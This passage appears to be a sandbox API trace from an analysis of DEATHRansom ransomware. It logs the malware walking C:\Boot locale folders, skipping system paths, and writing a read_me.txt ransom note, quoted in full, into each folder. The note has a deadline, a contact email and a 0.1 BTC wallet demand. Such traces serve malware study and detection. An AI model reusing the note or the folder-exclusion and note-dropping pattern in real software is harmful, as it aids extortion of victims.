lpFileName="\\\\?\\C:\\Boot\\da-DK\\*", lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0074.886] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\.") returned 19 [0074.886] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0074.886] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.886] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0074.886] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\..") returned 20 [0074.886] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.886] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0074.886] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 33 [0074.886] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0074.886] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0074.886] wnsprintfW (in: pszDest=0x8ae0078, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\da-DK\\read_me.txt") returned 29 [0074.886] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\read_me.txt" (normalized: "c:\\boot\\da-dk\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x79c [0074.886] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0074.886] WriteFile (in: hFile=0x79c, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17df5c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17df5c*=0x6b3, lpOverlapped=0x0) returned 1 [0074.887] CloseHandle (hObject=0x79c) returned 1 [0074.887] GetProcessHeap () returned 0x4f10000 [0074.887] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ae0078 | out: hHeap=0x4f10000) returned 1 [0074.888] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="de-DE", cAlternateFileName="")) returned 1 [0074.888] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE") returned 17 [0074.888] lstrcmpW (lpString1="de-DE", lpString2="..") returned 1 [0074.888] lstrcmpW (lpString1="de-DE", lpString2=".") returned 1 [0074.888] StrStrW (lpFirst="de-de", lpSrch="programdata") returned 0x0 [0074.888] StrStrW (lpFirst="de-de", lpSrch="$recycle.bin") returned 0x0 [0074.888] StrStrW (lpFirst="de-de", lpSrch="program files") returned 0x0 [0074.888] StrStrW (lpFirst="de-de", lpSrch="windows") returned 0x0 [0074.888] StrStrW (lpFirst="de-de", lpSrch="all users") returned 0x0 [0074.888] StrStrW (lpFirst="de-de", lpSrch="appdata") returned 0x0 [0074.888] GetProcessHeap () returned 0x4f10000 [0074.888] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ae0078 [0074.888] lstrcpyW (in: lpString1=0x8ae0078, lpString2="\\\\?\\C:\\Boot\\de-DE" | out: lpString1="\\\\?\\C:\\Boot\\de-DE") returned="\\\\?\\C:\\Boot\\de-DE" [0074.888] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 4 [0074.888] QueueUserWorkItem (Function=0x40a710, Context=0x8ae0078, Flags=0x0) returned 1 [0074.888] GetProcessHeap () returned 0x4f10000 [0074.888] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8af0080 [0074.888] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\*") returned 19 [0074.888] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\de-DE\\*", lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0074.917] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\.") returned 19 [0074.917] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0074.917] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.917] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0074.917] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\..") returned 20 [0074.917] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.917] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0074.917] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 33 [0074.917] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0074.917] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0074.917] wnsprintfW (in: pszDest=0x8af0080, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\de-DE\\read_me.txt") returned 29 [0074.917] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\read_me.txt" (normalized: "c:\\boot\\de-de\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0074.918] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0074.918] WriteFile (in: hFile=0x7a8, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17df5c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17df5c*=0x6b3, lpOverlapped=0x0) returned 1 [0074.919] CloseHandle (hObject=0x7a8) returned 1 [0074.919] GetProcessHeap () returned 0x4f10000 [0074.919] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8af0080 | out: hHeap=0x4f10000) returned 1 [0074.922] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="el-GR", cAlternateFileName="")) returned 1 [0074.922] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR") returned 17 [0074.922] lstrcmpW (lpString1="el-GR", lpString2="..") returned 1 [0074.922] lstrcmpW (lpString1="el-GR", lpString2=".") returned 1 [0074.922] StrStrW (lpFirst="el-gr", lpSrch="programdata") returned 0x0 [0074.922] StrStrW (lpFirst="el-gr", lpSrch="$recycle.bin") returned 0x0 [0074.922] StrStrW (lpFirst="el-gr", lpSrch="program files") returned 0x0 [0074.922] StrStrW (lpFirst="el-gr", lpSrch="windows") returned 0x0 [0074.922] StrStrW (lpFirst="el-gr", lpSrch="all users") returned 0x0 [0074.922] StrStrW (lpFirst="el-gr", lpSrch="appdata") returned 0x0 [0074.922] GetProcessHeap () returned 0x4f10000 [0074.922] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8a90050 [0074.923] lstrcpyW (in: lpString1=0x8a90050, lpString2="\\\\?\\C:\\Boot\\el-GR" | out: lpString1="\\\\?\\C:\\Boot\\el-GR") returned="\\\\?\\C:\\Boot\\el-GR" [0074.923] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 5 [0074.923] QueueUserWorkItem (Function=0x40a710, Context=0x8a90050, Flags=0x0) returned 1 [0074.923] GetProcessHeap () returned 0x4f10000 [0074.923] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ad0070 [0074.924] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\*") returned 19 [0074.924] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\el-GR\\*", lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0074.924] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\.") returned 19 [0074.924] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0074.925] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.925] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0074.925] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\..") returned 20 [0074.925] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.925] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0074.925] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 33 [0074.925] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0074.925] FindClose (in: hFindFile=0x7cfe928 | out: hFindFile=0x7cfe928) returned 1 [0074.926] wnsprintfW (in: pszDest=0x8ad0070, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\read_me.txt") returned 29 [0074.926] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\read_me.txt" (normalized: "c:\\boot\\el-gr\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7a8 [0074.926] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: ju9lcFFu56zzLExlZx2cW2ifvxjwfbgwyzul9UBh/BgA3e0IUwZylsyIN9LIO88Tk9b+qSwE8ly+hYxfwQRuemJp8GfcNEpY+aCIUm7NIZewRCyih6eYdUhNDvy3UIFyuYI2leSmGPcDOKXHUY1DxgtKJLdpGHolZYsmMjCSpJqg26CuWE4j975Lg4j5TG7TmV90Mf4Q9KxLGOFHnf0y8Be88DxVi4DSpUG61OVik5NPAUCsr44mft0DSiiDG6lkmMTK8rz/ZXQFplgDjlkFWIjCmJ8z/lzRBeQSGDXHajcXVhm7ole6fDlmmLAqc8JiPF6GJWiXRyC88p/XdmIEM1hyfaUTsIagp3Z4Jcar2Z6fNEN4HOQX4vh70F5mvDA9tNlQ4IGw0HHnAIsio7+XP6C5ESJpCTA56BqT+iYkjiLWnx7aCdkdjLS5GXmyqZwkpJ2pfidiGRAY+K/b4sr6MYxpq3HIsa4yilXCKU6g7nVzaLyRx9Mju7nqi4VzJmsae+7WaeW1JJWG6fDQQDKJ06UcNxKog4qqaFM0hQMpq8DSx8s2ekea+VNJR2RC3KxqGd5vnzP2ko6nan8bbGjQarI0/HCYwMv6YfEg3sQI9Ml0eGAiE54mxl0SQ46Y2c6qJQ8uWWkTrGHfyNeXzJtP1eKU1589G/XMM1nl46l26WpopWGz7EE5WhXprnpvZl+dWoJiaG1pxvThCNWoTFArWQ==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0074.926] WriteFile (in: hFile=0x7a8, lpBuffer=0x4f55310*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17df5c, lpOverlapped=0x0 | out: lpBuffer=0x4f55310*, lpNumberOfBytesWritten=0x17df5c*=0x6b3, lpOverlapped=0x0) returned 1 [0074.927] CloseHandle (hObject=0x7a8) returned 1 [0074.927] GetProcessHeap () returned 0x4f10000 [0074.927] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8ad0070 | out: hHeap=0x4f10000) returned 1 [0074.928] FindNextFileW (in: hFindFile=0x7cfe8e8, lpFindFileData=0x17df70 | out: lpFindFileData=0x17df70*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="en-US", cAlternateFileName="")) returned 1 [0074.928] wnsprintfW (in: pszDest=0x8ac0068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US") returned 17 [0074.928] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0074.928] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0074.928] StrStrW (lpFirst="en-us", lpSrch="programdata") returned 0x0 [0074.928] StrStrW (lpFirst="en-us", lpSrch="$recycle.bin") returned 0x0 [0074.928] StrStrW (lpFirst="en-us", lpSrch="program files") returned 0x0 [0074.928] StrStrW (lpFirst="en-us", lpSrch="windows") returned 0x0 [0074.928] StrStrW (lpFirst="en-us", lpSrch="all users") returned 0x0 [0074.928] StrStrW (lpFirst="en-us", lpSrch="appdata") returned 0x0 [0074.928] GetProcessHeap () returned 0x4f10000 [0074.928] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ad0070 [0074.928] lstrcpyW (in: lpString1=0x8ad0070, lpString2="\\\\?\\C:\\Boot\\en-US" | out: lpString1="\\\\?\\C:\\Boot\\en-US") returned="\\\\?\\C:\\Boot\\en-US" [0074.928] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 6 [0074.928] QueueUserWorkItem (Function=0x40a710, Context=0x8ad0070, Flags=0x0) returned 1 [0074.928] GetProcessHeap () returned 0x4f10000 [0074.928] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8ab0060 [0074.929] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\*") returned 19 [0074.929] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\en-US\\*", lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x7cfe928 [0074.979] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\.") returned 19 [0074.979] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0074.979] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0074.979] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: lpFindFileData=0x17dcf8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0074.979] wnsprintfW (in: pszDest=0x8ab0060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\en-US\\..") returned 20 [0074.979] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0074.979] FindNextFileW (in: hFindFile=0x7cfe928, lpFindFileData=0x17dcf8 | out: 